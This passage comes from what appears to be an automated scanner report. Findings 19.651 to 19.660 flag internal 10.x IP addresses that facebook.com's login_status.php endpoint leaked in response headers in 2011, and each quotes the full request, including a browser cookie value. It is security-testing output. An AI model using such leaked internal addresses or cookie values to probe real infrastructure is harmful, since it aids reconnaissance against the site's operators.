GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df68f2a1d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3fe6c675%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df279020da8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa61654c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df279020da8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a674085c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df279020da8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8b6d127c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df279020da8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.155.45
X-Cnection: close
Date: Thu, 16 Jun 2011 16:28:22 GMT
Content-Length: 22

Invalid Application ID

19.651. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.108.54

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28e7144a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffd7be705c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18e0cc764%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffd7be705c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4f46eb0%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33c98b914%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffd7be705c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4f46eb0&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1870f7cdc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffd7be705c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4f46eb0&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff75786f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffd7be705c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4f46eb0&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.108.54
X-Cnection: close
Date: Thu, 16 Jun 2011 18:42:54 GMT
Content-Length: 22

Invalid Application ID

19.652. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.69.50

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b7605c34%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df4c442e74%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d539448%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15517a6c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d539448&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df359db8bbc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d539448&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df219fe1adc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d539448&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.69.50
X-Cnection: close
Date: Thu, 16 Jun 2011 11:25:04 GMT
Content-Length: 22

Invalid Application ID

19.653. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.21.50

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33c07dc78%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bfa30978%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e07d763%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b55e2f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e07d763&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2529b0f94%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e07d763&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e77b8f0%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e07d763&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.21.50
X-Cnection: close
Date: Thu, 16 Jun 2011 15:00:29 GMT
Content-Length: 22

Invalid Application ID

19.654. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.181.113

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38ca2bc8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9173f45c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d9083914%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df70622fe%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d9083914&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1223b53c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d9083914&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c85fd2e%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d9083914&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.181.113
X-Cnection: close
Date: Thu, 16 Jun 2011 16:02:30 GMT
Content-Length: 22

Invalid Application ID

19.655. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.75.38

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25614dfd8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26bdc2b54%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df186618088%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df399e79658%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df186618088&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33abaca8c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df186618088&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9d809318%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df186618088&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.75.38
X-Cnection: close
Date: Thu, 16 Jun 2011 16:23:10 GMT
Content-Length: 22

Invalid Application ID

19.656. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.233.32

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df348b4b4f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2893ba418%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33695734%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a2a66ab8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33695734&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1247d768%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33695734&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2aa0f22e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33695734&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.233.32
X-Cnection: close
Date: Thu, 16 Jun 2011 18:11:51 GMT
Content-Length: 22

Invalid Application ID

19.657. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.230.63

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df69aba3a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39034f62c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1e8fb0978%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa6ebc70%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1e8fb0978&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8fc3fc4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1e8fb0978&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cd8492e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1e8fb0978&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.230.63
X-Cnection: close
Date: Thu, 16 Jun 2011 12:51:18 GMT
Content-Length: 22

Invalid Application ID

19.658. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.123.31

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bca22ea4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdda297dc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e1e4f10%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df62c3340c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e1e4f10&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b16a4fbc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e1e4f10&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17b5e3ee%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e1e4f10&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.123.31
X-Cnection: close
Date: Thu, 16 Jun 2011 14:08:49 GMT
Content-Length: 22

Invalid Application ID

19.659. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.146.49

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2864fbaac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39d7daa48%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2921b9a28%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11532c424%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2921b9a28&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df223ef4ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2921b9a28&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21828dc3%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2921b9a28&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.146.49
X-Cnection: close
Date: Thu, 16 Jun 2011 14:19:09 GMT
Content-Length: 22

Invalid Application ID

19.660. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.97.35

Request

